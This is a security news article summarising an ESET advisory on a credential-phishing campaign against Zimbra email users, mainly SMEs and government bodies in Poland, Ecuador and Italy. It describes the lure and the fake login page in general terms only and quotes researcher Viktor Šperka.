Cybersecurity researchers at ESET have exposed an ongoing mass-spreading phishing campaign that explicitly targets Zimbra Collaboration email server users. The campaign, which has been active since at least April 2023, aims to harvest the credentials of Zimbra account holders.
Writing in an advisory published earlier today, ESET said its telemetry suggested that the campaign has primarily targeted small and medium-sized enterprises (SMEs) and governmental entities, with a notable concentration of victims in Poland, followed by Ecuador and Italy.
The phishing campaign involves a multi-step process. Initially, targets receive an email containing an attached HTML file. The email typically masquerades as a server administrator, luring recipients into believing there is an urgent need for an email server update or that their account is at risk of deactivation. When the attached file is opened, victims are presented with a deceptive Zimbra login page that closely mimics the legitimate version, complete with pre-filled username fields.
Once victims input their login credentials, the malicious HTML form collects the information and sends it via HTTPS POST request to a server controlled by the attackers. What sets this campaign apart is its ability to propagate further: ESET has documented instances of subsequent waves of phishing emails sent from previously compromised Zimbra accounts. It appears that attackers gain access to administrator accounts and create new mailboxes to send phishing emails to other potential targets.
Although this phishing campaign relies on social engineering and user interaction, its wide distribution and success rate underscore the need for continued vigilance among Zimbra users, warned ESET malware researcher Viktor Šperka.
“Despite this campaign not being so technically sophisticated, it is still able to spread and successfully compromise organizations that use Zimbra Collaboration, which remains an attractive target for adversaries,” Šperka wrote. “Adversaries leverage the fact that HTML attachments contain legitimate code, and the only telltale element is a link pointing to the malicious host.”
The security expert added that this approach simplifies bypassing anti-spam policies based on reputation, in contrast to phishing methods involving placing a malicious link directly within the email body.
“The popularity of Zimbra Collaboration among organizations expected to have lower IT budgets ensures that it stays an attractive target for adversaries.”
For organizations seeking to enhance their defense against this threat, a comprehensive list of indicators of compromise (IoC) can be found in the complete advisory, available here.